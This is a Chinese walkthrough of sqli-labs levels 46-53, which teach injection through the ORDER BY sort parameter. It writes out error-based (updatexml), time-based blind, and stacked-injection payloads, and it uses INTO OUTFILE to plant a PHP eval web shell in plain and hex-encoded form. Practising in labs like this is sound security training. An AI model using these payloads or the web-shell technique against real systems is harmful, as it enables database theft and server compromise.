sqli-libs(46-53关)
Less_46
补充知识:MySQL知识
SQL语句中,asc是指定列按升序排列,desc则是指定列 按降序排列;
Select * from users order by 1 desc; 使用降序进行排列;
Select * from users order by 1 asc; 使用升序进行排列;
Right() select right(database(),1) 从右往左数第一个数据库;
Left() select left(database(),1) 从左往右数第一个数据库;
less46没有使用包裹
输入?id=1 得到下面,所以我们使用?sort=1 进行操作 其中1代表把第一列按从小到大进行排列;
修改为2,即为将第二列按从小到大进行排列;
?Sort=2 desc; 使用降序进行排列;
?Id=2 asc; 使用升序进行排列;
说明这里存在注入漏洞
三种方法:
1.报错注入
2.时间盲注
3.一句话木马
方法一:报错注入
输入:?sort=3 and updatexml( 1, concat( 0x7e, (database())), 1) --+ 得到当前数据库;
输入:?sort=3 and updatexml( 1, concat( 0x7e, (select schema_name from information_schema.schemata limit 0,1), 1) ,1)--+ 得到第一个数据库名字;
方法二: 时间盲注
输入:?sort=3 and if(length(database()=1),1,sleep(5))--+
输入:?sort=3 and if(left((select schema_name from information_schema.schemata limit 0,1),1)>'s',1,sleep(5))--+
方法三:一句话木马
输入 ?sort=3 and (select '<?php @eval($_POST[gxy]);?>') into outfile 'C:\\phpStudy\\WWW\\c.php '--+
我们并没有把一句话木马写进去,所以我们采取 lines terminated by 0x 十六进制进行注入;
输入 ?sort=3 into outfile "C:\\phpStudy\\WWW\\c.php" lines terminated by 0x3c3f70687020406576616c28245f504f53545b27677879275d293b203f3e --+
Less_47
Less47:使用’’包裹 其他与第46关基本一致
Less_48
Less48: 无包裹 不返回报错信息 不能使用报错注入,其他操作与第46关基本一致。
Less_49
Less49: 使用“”包裹 不返回报错信息 不能使用报错注入,其他操作与第46关基本一致
Less_50
Less50无包裹
第50关与第46关不同的是 使用了mysqli_multi_query函数
mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。
所以我们可以用堆叠注入的方法;
五种方法:
1.时间的盲注
2.报错注入
3.写一句话木马
4.使用堆叠注入创建删除一个表
5.使用堆叠 注入写一句话木马
方法一:时间盲注
?sort=1 and if(length(database()>1),1,sleep(5)) --+
方法二:报错盲注
?sort=1 and updatexml(1,concat(0x7e,(database())),1)--+
方法三:写一句话木马
输入:?sort=1 and (select '<?php @eval($_POST[ztt]);?>') into outfile 'C:\\phpStudy\\WWW\\a.php '--+
发现一句话木马并没有,输入:?sort=1 into outfile "C:\\phpStudy\\WWW\\a.php" lines terminated by 0x3c3f70687020406576616c28245f504f53545b27677879275d293b203f3e --+
方法四:使用堆叠注入创建一个表
?sort=3;create table ztt50 like users;insert into ztt50 select * from users;--+
Less_51
Less-51: 使用’’包裹 其他操作与第50关基本一致。
五种方法:
1.时间的盲注
2.报错注入
3.写一句话木马
4.使用堆叠注入创建删除一个表
5.使用堆叠 注入写一句话木马
Less_52
Less-52: 无包裹 回显不显示错误 不能使用报错注入,则其他方法与第50关基本一致
四种方法:
1.时间的盲注
2.写一句话木马
3.使用堆叠注入创建删除一个表
4.使用堆叠 注入写一句话木马
Less_53
Less-53:使用’’包裹 不回显错误 不能使用报错注入 其他方法与第50关基本一致。
四种方法:
1.时间的盲注
2.写一句话木马
3.使用堆叠注入创建删除一个表
4.使用堆叠 注入写一句话木马
最新文章
- IOS学习之-私人通讯录
- Jmeter之参数化
- Android斗地主棋牌游戏牌桌实现源码下载
- Hbernate映射类型
- hdu1213 并查集(不压缩)
- -XX:+printGC
- [POI 2008][BZOJ 1132]Tro
- JSX架构及注释
- JavaScript 的原型对象 Prototype
- 搭建 Win CE6.0 设备开发环境
- 告别无止境的增删改查--Java代码生成器
- Open judge 07和为给定数
- JVM内存分配和回收
- POJ-1182 食物链(并查集)
- android之使用GridView+仿微信图片上传功能
- Hibernate第四篇【集合映射、一对多和多对一】
- js 关于日期,字符串转化
- geoserver发布瓦片,geoserver发布arcgis切片和geoserver发布金字塔切片
- 网络流24题——分配问题 luogu 4014
- 廖雪峰Java2-2数据封装-2构造方法
热门文章
- 优化公式排版和Beamer相关知识
- MongoDB的安装问题
- nginx配置长连接(ajax60秒请求超时)
- webpack 之搭建本地服务器
- JS高级---识别正则表达式是否匹配
- 2.js将Date对象转换成“2018-05-10”字符串格式化的时间
- 2019牛客多校第七场 F Energy stones 树状数组+算贡献转化模拟
- [一本通学习笔记] KMP算法
- pytorch save model + Gmatch4py + jupyter debugger + community structure
- 【原】librtmp源码详解